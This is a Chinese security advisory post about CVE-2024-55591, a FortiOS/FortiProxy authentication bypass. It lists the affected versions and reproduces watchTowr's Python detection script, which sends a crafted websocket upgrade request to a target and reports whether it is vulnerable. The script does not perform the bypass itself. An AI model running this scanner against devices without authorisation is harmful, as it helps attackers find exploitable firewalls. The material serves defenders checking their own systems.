CVE-2024-55591｜FortiOS和FortiProxy身份认证绕过漏洞（POC）

信安百科

发布于 2025-07-30 14:40:43

22000

代码可运行

文章被收录于专栏：信安百科信安百科

运行总次数：0

代码可运行

0x00 前言

FortiOS是美国飞塔（Fortinet）公司开发的一套专用于FortiGate网络安全平台上的安全操作系统，FortiOS本身就具有多种功能，防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web过滤、反垃圾邮件和应用控制（即时通讯和P2P），以及带宽控制。

FortiProxy是Fortinet推出的一款高性能代理产品，它结合了Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护等多种检测技术，以保护用户免受网络攻击。

0x01 漏洞描述

未经身份验证的远程攻击者可以通过向 Node.js websocket 模块发送特制请求，成功利用此漏洞可使攻击者获得超级管理员权限。

0x02 CVE编号

CVE-2024-55591

0x03 影响版本

7.0.0 <= FortiOS 7.0.* <= 7.0.16
7.0.0 <= FortiProxy 7.0.* <= 7.0.19
7.2.0 <= FortiProxy 7.2.* <= 7.2.12

0x04 漏洞详情

POC：

https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591

import requests
import random
from uuid import uuid4
from datetime import datetime, timedelta
import argparse

banner = """\
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
     \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\\\|    | /  _ \\ \\/ \\/ \\_  __ \\
      \\     / / __ \\|  | \\  \\\\___|   Y  |    |(  <_> \\     / |  | \\\n       \\/\\_/ (____  |__|  \\\\\\\___  |___|__|__  | \\\\__  / \\\/\\_/  |__|   
                  \\\          \\\     \\\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr

          - Sonny , watchTowr (sonny@watchTowr.com)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)

        CVEs: [CVE-2024-55591]
"""

def generate_random_suffix(length=6):
    """Generate a random lowercase suffix."""
    return ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(length))

def perform_web_interaction(target, port):
    """
    Perform a two-step web interaction with specific parameters.

    Args:
        target (str): Target IP address
        port (int): Target port

    Returns:
        tuple: Results of the two requests
    """
    # Construct base URL
    base_url = f"https://{target}:{port}"

    # Generate random suffix
    random_suffix = generate_random_suffix()

    # Disable SSL verification warnings
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

    # First request - login-like endpoint
    first_url = f"{base_url}/login?redir=/ng"
    first_response = requests.get(first_url, verify=False, timeout=10)

    # Second request - endpoint with random suffix
    second_url = f"{base_url}/watchTowr-{random_suffix}"
    second_headers = {
        'Sec-WebSocket-Version': '13',
        'Sec-WebSocket-Key': 'thFz/fKwzu5wDEy0XO3fcw==',
        'Connection': 'keep-alive, Upgrade',
        'Upgrade': 'websocket'
    }
    second_response = requests.get(second_url, headers=second_headers, verify=False, timeout=10)

    return first_response, second_response

def validate_interaction_conditions(first_response, second_response):
    """
    Validate specific conditions for the web interaction.

    Args:
        first_response (requests.Response): First HTTP response
        second_response (requests.Response): Second HTTP response

    Returns:
        bool: Whether all conditions are met
    """
    try:
        # Check status codes
        status_code_1_check = first_response.status_code == 200
        status_code_2_check = second_response.status_code == 101

        # Check body contents for first response
        html_main_app_check = '<html class="main-app">' in first_response.text
        f_icon_warning_check = '<f-icon class="fa-warning' in first_response.text
        f_icon_closing_check = '</f-icon>' in first_response.text

        body_checks = html_main_app_check and f_icon_warning_check and f_icon_closing_check

        # Check for specific header marker
        header_marker_check = any('APSCOOKIE_' in str(header) for header in first_response.headers.values())

        # Check connection upgrade for second response
        connection_upgrade_check = 'Upgrade' in second_response.headers.get('Connection', '')

        # Print detailed information about first response matchers
        if not html_main_app_check:
            print("[!] Target is not a FortiOS Management Interface")
            exit()

        if not f_icon_warning_check:
            print("[!] '<f-icon class=\"fa-warning\"' not found in response")

        # Combine all checks
        return all([
            status_code_1_check,
            status_code_2_check,
            body_checks,
            header_marker_check,
            connection_upgrade_check
        ])
    except Exception as e:
        print(f"[!] Error during validation: {e}")
        return False

def main():
    """
    Main function to run the web interaction checks.
    """
    print(banner)

    parser = argparse.ArgumentParser(description='CVE-2024-55591 Detection Tool')
    parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
    parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
    args = parser.parse_args()

    try:
        print(f"[*] Targeting: https://{args.target}:{args.port}")
        first_response, second_response = perform_web_interaction(args.target, args.port)

        result = validate_interaction_conditions(first_response, second_response)

        if result:
            print("[!] VULNERABLE: All conditions were met")
        else:
            print("[*] NOT VULNERABLE: Conditions were not satisfied")

    except requests.RequestException as e:
        print(f"[!] Request error: {e}")
    except Exception as e:
        print(f"[!] Unexpected error: {e}")

if __name__ == "__main__":
    main()

0x05 参考链接

https://fortiguard.fortinet.com/psirt/FG-IR-24-535

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2025-01-18，如有侵权请联系 cloudcommunity@tencent.com 删除

random